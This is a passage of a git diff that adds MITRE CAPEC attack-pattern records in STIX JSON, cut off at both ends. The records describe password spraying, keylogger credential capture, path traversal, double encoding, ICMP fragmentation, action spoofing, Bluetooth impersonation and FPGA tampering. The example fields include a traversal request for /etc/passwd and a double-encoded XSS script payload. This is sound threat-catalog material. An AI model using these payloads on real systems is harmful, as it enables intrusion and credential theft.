", + "x_capec_extended_description": "\n Password Spraying attacks often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. Successful execution of Password Spraying attacks usually lead to lateral movement within the target, which allows the adversary to impersonate the victim or execute any action that the victim is authorized to perform. If the password chosen by the user is commonly used or easily guessed, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Password Spraying Attacks are similar to Dictionary-based Password Attacks (CAPEC-16) in that they both leverage precompiled lists (i.e. dictionaries) of username/password combinations to try against a system/application. The primary difference is that Password Spraying Attacks leverage a known list of user accounts and only try one password for each account before moving onto the next password. In contrast, Dictionary-based Password Attacks leverage unknown username/password combinations and are often executed offline against files containing hashed credentials, where inducing an account lockout is not a concern.\n Password Spraying Attacks are also similar to Credential Stuffing attacks (CAPEC-600), since both utilize known user accounts and often attack the same targets. Credential Stuffing attacks, however, leverage known username/password combinations, whereas Password Spraying attacks have no insight into known username/password pairs. If a Password Spraying attack succeeds, it may additionally lead to Credential Stuffing attacks on different targets.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts on the target system/application." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "Applicable password lists.", + "A password cracking tool or a custom script that leverages the password list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Password Spraying attack is very straightforward. A variety of password cracking tools are widely available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json new file mode 100644 index 0000000000000000000000000000000000000000..0dfee34ab6e61b28713141e956a8b61d913e0acf --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f.json @@ -0,0 +1,56 @@ +{ + "id": "bundle--b01dfd73-d42e-4411-aebd-35dd718b3ebd", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deploys a keylogger in an effort to obtain credentials directly from a system's user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.", + "external_references": [ + { + "external_id": "CAPEC-568", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/568.html" + }, + { + "description": "Input Capture:Keylogging", + "external_id": "T1056.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/001" + } + ], + "id": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Capture Credentials via Keylogger", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine which user's credentials to capture: Since this is a more targeted attack, an adversary will first identify a particular user they wish the capture the credentials of.

Experiment

  1. Deploy keylogger: Once a user is identified, an adversary will deploy a keylogger to the user's system in one of many ways.

    2. Techniques
    Send a phishing email with a malicious attachment that installs a keylogger on a user's system
    Conceal a keylogger behind fake software and get the user to download the software
    Get a user to click on a malicious URL that directs them to a webpage that will install a keylogger without their knowledge
    Gain access to the user's system through a vulnerability and manually install a keylogger

  2. Record keystrokes: Once the keylogger is deployed on the user's system, the adversary will record keystrokes over a period of time.

  3. Analyze data and determine credentials: Using the captured keystrokes, the adversary will be able to determine the credentials of the user.

    4. Techniques
    Search for repeated sequences that are following by the enter key
    Search for repeated sequences that are not found in a dictionary
    Search for several backspaces in a row. This could indicate a mistyped password. The correct password can then be inferred using the whole key sequence

Exploit

  1. Use found credentials: After the adversary has found the credentials for the target user, they will then use them to gain access to a system in order to perform some follow-up attack

", + "x_capec_prerequisites": [ + "The ability to install the keylogger, either in person or remote." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json new file mode 100644 index 0000000000000000000000000000000000000000..546363d2062ef699547225622df9e2ab703d8293 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170.json @@ -0,0 +1,110 @@ +{ + "id": "bundle--4f0c645d-7ea9-4182-ae69-ed1f3fe95b5c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files.", + "external_references": [ + { + "external_id": "CAPEC-126", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/126.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "description": "Path Traversal", + "external_id": "33", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Path-Traversal" + }, + { + "description": "Path Traversal", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Path_Traversal" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Directory Traversal" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request\n http://example/../../../../../etc/passwd\n From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable file inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62" + ], + "x_capec_prerequisites": [ + "The attacker must be able to control the path that is requested of the target.", + "The target must fail to adequately sanitize incoming paths" + ], + "x_capec_resources_required": [ + "The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks or to inject the malicious payload in a web page.", + "Medium": "Customizing attacks to bypass non trivial filters in the application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json new file mode 100644 index 0000000000000000000000000000000000000000..f47a68a3b26acb3c03420ddb1728d78b71ade032 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9.json @@ -0,0 +1,99 @@ +{ + "id": "bundle--17aa9d8e-11c5-4094-b6ac-174c590ef85e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.", + "external_references": [ + { + "external_id": "CAPEC-120", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + } + ], + "id": "attack-pattern--fb506d15-6cda-4669-8fc2-fb41061099d9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Double Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:\n %253Cscript%253Ealert('This is an XSS Attack')%253C%252Fscript%253E\n Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an adversary may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An adversary can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.

    2. Techniques
    Try to use double-encoding to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.", + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_resources_required": [ + "Tools that automate encoding of data can assist the adversary in generating encoded strings." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json new file mode 100644 index 0000000000000000000000000000000000000000..077eeb761437d72b24d15955cafe791e28126b4a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--03088e52-02e8-437f-9738-d1ee35c68bd4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern has been deprecated as it was determined to be an unnecessary layer of abstraction. Please refer to the standard level pattern CAPEC-312 : Active OS Fingerprinting going forward, or to any of the detailed patterns that are children of CAPEC-312.", + "external_references": [ + { + "external_id": "CAPEC-315", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/315.html" + } + ], + "id": "attack-pattern--fb5cd90b-cd8e-4df7-958b-6d0e4304507f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: TCP/IP Fingerprinting Probes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json new file mode 100644 index 0000000000000000000000000000000000000000..ad672c95071f79437d0a968bf8107e65a8e3735d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de.json @@ -0,0 +1,55 @@ +{ + "id": "bundle--76208529-fdee-42a3-8f84-7535f165b87b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.", + "external_references": [ + { + "external_id": "CAPEC-496", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/496.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "ICMP Attacks Illustrated", + "external_id": "REF-425", + "source_name": "reference_from_CAPEC", + "url": "http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats" + } + ], + "id": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "modified": "2019-04-04T00:00:00.000Z", + "name": "ICMP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send arbitrary sized ICMP packets to the target." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json new file mode 100644 index 0000000000000000000000000000000000000000..6e8d495034bf57c6023e3e89f890bb75a374897e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8.json @@ -0,0 +1,61 @@ +{ + "id": "bundle--b0fafa71-7ab1-4be1-a9d6-34389c838c38", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to disguise one action for another and therefore trick a user into initiating one type of action when they intend to initiate a different action. For example, a user might be led to believe that clicking a button will submit a query, but in fact it downloads software. Adversaries may perform this attack through social means, such as by simply convincing a victim to perform the action or relying on a user's natural inclination to do so, or through technical means, such as a clickjacking attack where a user sees one interface but is actually interacting with a second, invisible, interface.", + "external_references": [ + { + "external_id": "CAPEC-173", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + } + ], + "id": "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Action Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Confidentiality": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ], + "Integrity": [ + "Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef", + "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4", + "attack-pattern--1995c522-a25d-46e4-b024-65172771a692", + "attack-pattern--79309efd-dd13-41d2-81c6-ec382bced2b4" + ], + "x_capec_prerequisites": [ + "The adversary must convince the victim into performing the decoy action.", + "The adversary must have the means to control a user's interface to present them with a decoy action as well as the actual malicious action. Simple versions of this attack can be performed using web pages requiring only that the adversary be able to host (or control) content that the user visits." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json new file mode 100644 index 0000000000000000000000000000000000000000..73953a2c12e3b8942eab7c622caa5d945ee7ec19 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5.json @@ -0,0 +1,56 @@ +{ + "id": "bundle--f2df8470-e6e5-403e-a8d6-aadfac0fd205", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary disguises the MAC address of their Bluetooth enabled device to one for which there exists an active and trusted connection and authenticates successfully. The adversary can then perform malicious actions on the target Bluetooth device depending on the target’s capabilities.", + "external_references": [ + { + "external_id": "CAPEC-667", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/667.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + } + ], + "id": "attack-pattern--fcb77578-4d3d-4cb3-ae1d-91c9877a60c5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Bluetooth Impersonation AttackS (BIAS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [], + "Integrity": [] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find disguise and target: The adversary starts the Bluetooth service on the attacking device and searches for nearby listening devices.

    2. Techniques
    Knowledge of a trusted MAC address.
    Scanning for devices other than the target that may be trusted.

Experiment

  1. Disguise: Using the MAC address of the device the adversary wants to impersonate, they may use a tool such as spooftooth or macchanger to spoof their Bluetooth address and attempt to authenticate with the target.

Exploit

  1. Use device capabilities to accomplish goal: Finally, if authenticated successfully the adversary can perform tasks/information gathering dependent on the target's capabilities and connections.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Knowledge of a target device's list of trusted connections." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be in close proximity to Bluetooth devices." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json new file mode 100644 index 0000000000000000000000000000000000000000..78bfc74d4b1854d4c92b1e8187b0de4f9ce52309 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e.json @@ -0,0 +1,75 @@ +{ + "id": "bundle--65971573-bffa-4e53-80be-678438cdaea1", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the functionality of a field-programmable gate array (FPGA) by causing an FPGA configuration memory chip reload in order to introduce a malicious function that could result in the FPGA performing or enabling malicious functions on a host system. Prior to the memory chip reload, the adversary alters the program for the FPGA by adding a function to impact system operation.\n ", + "external_references": [ + { + "external_id": "CAPEC-674", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/674.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Design for FPGA Maliciously Altered", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An adversary with access and the ability to alter the configuration/programming of FPGAs in organizational systems, introduces a trojan backdoor that can be used to alter the behavior of the original system resulting in, for example, compromise of confidentiality of data being processed.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to FPGA programming/configuration-related systems in a chip maker’s development environment where FPGAs can be initially configured prior to delivery to a customer or have access to such systems in a customer facility where end-user FPGA configuration/reconfiguration can be performed." + ], + "x_capec_skills_required": { + "High": "An adversary would need to be skilled in FPGA programming in order to create/manipulate configurations in such a way that when loaded into an FPGA, the end user would be able to observe through testing all user-defined required functions but would be unaware of any additional functions the adversary may have introduced." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json new file mode 100644 index 0000000000000000000000000000000000000000..cdf905d293c00dd92db1773d30a12f4b6b820254 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482.json @@ -0,0 +1,96 @@ +{ + "id": "bundle--aca56fda-b0b1-4fb3-b3d1-e167b074bf6e", + "objects": [ + { + 